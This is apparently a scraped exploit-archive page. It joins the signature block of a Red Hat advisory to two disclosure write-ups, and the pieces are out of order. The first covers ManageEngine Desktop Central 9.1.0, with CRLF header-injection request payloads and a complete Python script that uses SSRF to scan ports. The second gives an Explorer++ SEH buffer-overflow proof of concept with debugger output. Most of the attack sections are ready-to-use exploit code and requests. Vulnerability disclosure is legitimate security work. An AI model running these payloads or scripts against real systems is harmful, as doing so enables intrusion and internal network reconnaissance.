https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4269  
https://access.redhat.com/security/cve/CVE-2022-4744  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCFeo9zjgjWX9erEAQgTUg//fBVoxwGBUaAb9nrFYK8q0g1KSW54WFsi  
zHPZXQ4a6jvHF4Zh2uA50BV5mljbm4NsGLTw+beeJrPvEVreIlsF+AFvwtGzLF3I  
ELMtdGDTDgCG+A3tTtlr0IAYdshunP5TEiUobiO5Ad6Olf+6nWFaiLCSZzGn8uE6  
KucMrENdG41cxU/2V9zlYaAhUcyZ5rzo2xJLeWFKDeThZnhAUsMd1ymMKwtD96f5  
h1BHD1egkmhNMKsT0GZwMxxG/kGgvtvEW3vT/QOS/V8/8Hzc+XYvrs0w3Q0n9wLf  
cJrLyehUd8BHsQaV/sgATq5sW+07R133v6wuIWOADQk+Ns8oblZUQ6OxZ+08VT/y  
Y/Vkm8q6ei3LUuFizdjsoDN4Jy8woFNY6LxrtVgbqY9vC9teuaMTsSL9uP0cV3TC  
Jx2DXF4B9QMX2ID7lPgipmEQkXqJwtyGFfvDADXP4xP+JtZc4/AdxEtU6bd7k5lE  
05Fme21iZ+2eQ87ENLkJ/HiSDgiNjwYLmt2g+QT1fI/XTd/iI7x+lMRbIFMnelM+  
DX5gt/RerNgzQSIhfT42+XAnzsQkL1aIWWXYgyJ7F7wM4JAaFhq+8n3BqL/q/Yp4  
prEMAYOGp7rae/y5a5BMjnt+VjaU/k1WF6t4e7LyJoX94Eo8EuhUy2slMsaGvxBr  
skVp9tUzijI=  
=uISX  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1469-01

Desktop Central version 9.1.0 suffers from crlf injection, and server-side request forgery vulnerabilities.

    # Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-02-14# Software Link : http://www.desktopcentral.com# Tested Version: 9.1.0 (Build No: 91084)# Tested on:  Windows 10# Vulnerability Type: CRLF injection (CRLF) - 1CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.csv.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.csv?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostResponse:HTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013.csvX-dc-header: yesContent-Length: 95Keep-Alive: timeout=5, max=20Connection: Keep-AliveContent-Type: text/csv;charset=UTF-8# Vulnerability Type: CRLF injection (CRLF) - 2CVSS v3: 6.1CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-93Vulnerability description: CRLF injection vulnerability in ManageEngineDesktop Central 9.1.0 allows remote attackers to inject arbitrary HTTPheaders and conduct HTTP response splitting attacks via the fileNameparameter in a /STATE_ID/1613157927228/InvSWMetering.pdf.Proof of concept:GEThttps://localhost/STATE_ID/1613157927228/InvSWMetering.pdf?toolID=2191&=&toolID=2191&fileName=any%0D%0ASet-cookie%3A+Tamper%3Df0f0739c-0499-430a-9cf4-97dae55fc013&isExport=trueHTTP/1.1User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101Firefox/85.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3DNT: 1Connection: keep-aliveReferer:https://localhost/invSWMetering.do?actionToCall=swMetering&toolID=2191&selectedTreeElem=softwareMeteringUpgrade-Insecure-Requests: 1Content-Length: 0Cookie: DCJSESSIONID=0B20DEF653941DAF5748931B67972CDB; buildNum=91084;STATE_COOKIE=%26InvSWMetering%2FID%2F394%2F_D_RP%2FtoolID%253D2191%2526%2F_PL%2F25%2F_FI%2F1%2F_TI%2F0%2F_SO%2FA%2F_PN%2F1%2F_TL%2F0%26_REQS%2F_RVID%2FInvSWMetering%2F_TIME%2F1613157927228;showRefMsg=false; summarypage=false;DCJSESSIONIDSSO=8406759788DDF2FF6D034B0A54998D44; dc_customerid=1;JSESSIONID=0B20DEF653941DAF5748931B67972CDB;JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; screenResolution=1280x1024Host: localhostHTTP/1.1 200 OKDate:Server: ApachePragma: publicCache-Control: max-age=0Expires: Wed, 31 Dec 1969 16:00:00 PSTSET-COOKIE: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/; HttpOnly;SecureSet-Cookie: buildNum=91084; Path=/Set-Cookie: showRefMsg=false; Path=/Set-Cookie: summarypage=false; Path=/Set-Cookie: dc_customerid=1; Path=/Set-Cookie: JSESSIONID=0B20DEF653941DAF5748931B67972CDB; Path=/Set-Cookie: JSESSIONID.b062f6aa=vi313syfqd0c6r7bgwvy85u; Path=/Set-Cookie: screenResolution=1280x1024; Path=/Content-Disposition: attachment; filename=anySet-cookie: Tamper=f0f0739c-0499-430a-9cf4-97dae55fc013X-dc-header: yesContent-Length: 4470Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/pdf;charset=UTF-8# Vulnerability Type: Server-Side Request Forgery (SSRF)CVSS v3: 8.0CVSS vector: CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:HCWE: CWE-918 Server-Side Request Forgery (SSRF)Vulnerability description: Server-Side Request Forgery (SSRF) vulnerabilityin ManageEngine Desktop Central 9.1.0 allows an attacker can force avulnerable server to trigger malicious requests to third-party servers orto internal resources. This vulnerability allows authenticated attackerwith network access via HTTP and can then be leveraged to launch specificattacks such as a cross-site port attack, service enumeration, and variousother attacks.Proof of concept:Save this content in a python file (ex. ssrf_manageenginedesktop9.py),change the variable sitevuln value with ip address:import argparsefrom termcolor import coloredimport requestsimport urllib3import datetimeurllib3.disable_warnings()print(colored('''------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------''',"red"))def smtpConfig_ssrf(target,port,d):    now1 = datetime.datetime.now()    text = ''    sitevuln = 'localhost'    url = 'https://'+sitevuln+'/smtpConfig.do?actionToCall=valSmtpConfig&smtpServer='+target+'&smtpPort='+port+'&senderAddress=admin%40manageengine.com&validateUser=false&tlsEnabled=false&smtpsEnabled=false&toAddress=admin%40manageengine.com'    cookie = 'DCJSESSIONID=A9F4AB5F4C43AD7F7D2C4D7B002CBE73;buildNum=91084; showRefMsg=false; dc_customerid=1; summarypage=false;JSESSIONID=D10A9C62D985A0966647099E14C622F8;DCJSESSIONIDSSO=DFF8F342822DA6E2F3B6064661790CD0'    try:        response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0(Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3','Referer': 'https://192.168.56.250:8383/smtpConfig.do','Cookie':        cookie,'Connection': 'keep-alive'},verify=False, timeout=10)        text = response.text        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if ('updateRefMsgCookie' in text):            return colored('Cookie lost',"yellow")        if d == "0":            print ('Time response: ' + str(rest) + '\n' + text + '\n')        if (seconds > 5.0):            return colored('open',"green")        else:            return colored('closed',"red")    except:        now2 = datetime.datetime.now()        rest = (now2 - now1)        seconds = rest.total_seconds()        if (seconds > 10.0):            return colored('open',"green")        else:            return colored('closed',"red")    return colored('unknown',"yellow")if __name__ == "__main__":    parser = argparse.ArgumentParser()    parser.add_argument('-i','--ip', help="ManageEngine Desktop Central 9 -SSRF Open ports",required=True)    parser.add_argument('-p','--port', help="ManageEngine Desktop Central 9- SSRF Open ports",required=True)    parser.add_argument('-d','--debug', help="ManageEngine Desktop Central9 - SSRF Open ports (0 print or 1 no print)",required=False)    args = parser.parse_args()    timeresp = smtpConfig_ssrf(args.ip,args.port,args.debug)    print (args.ip + ':' + args.port + ' ' + timeresp + '\n')And:$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 8080------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:8080 open$ python3 ssrf_manageenginedesktop9.py -i 192.168.56.250 -p 7777------[ ManageEngine Desktop Central 9 - SSRF Open ports ]------192.168.56.250:7777 closed

Desktop Central 9.1.0 CRLF Injection / Server-Side Request Forgery

Explorer32++ version 1.3.5.531 suffers from a buffer overflow vulnerability.

    # Exploit Title: Explorer32++ 1.3.5.531 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-09# Vendor Homepage: http://www.explorerplusplus.com/# Software Link : http://www.explorerplusplus.com/# Tested Version: 1.3.5.531# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Buffer overflow controlling the Structured Exception Handler (SEH) recordsin Explorer++ 1.3.5.531, and possibly other versions, may allow attackersto execute arbitrary code via a long file name argument.Proof of concept:Open Explorer32++.exe from command line with a large string in Arguments,more than 396 chars:File '<Explorer++_PATH>\Explorer32++.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'SEH chain of main threadAddress    SE handler0018FB14   0069004100370069   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fb14 overwritten withunicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclicdata after the handler

Source

Packet Storm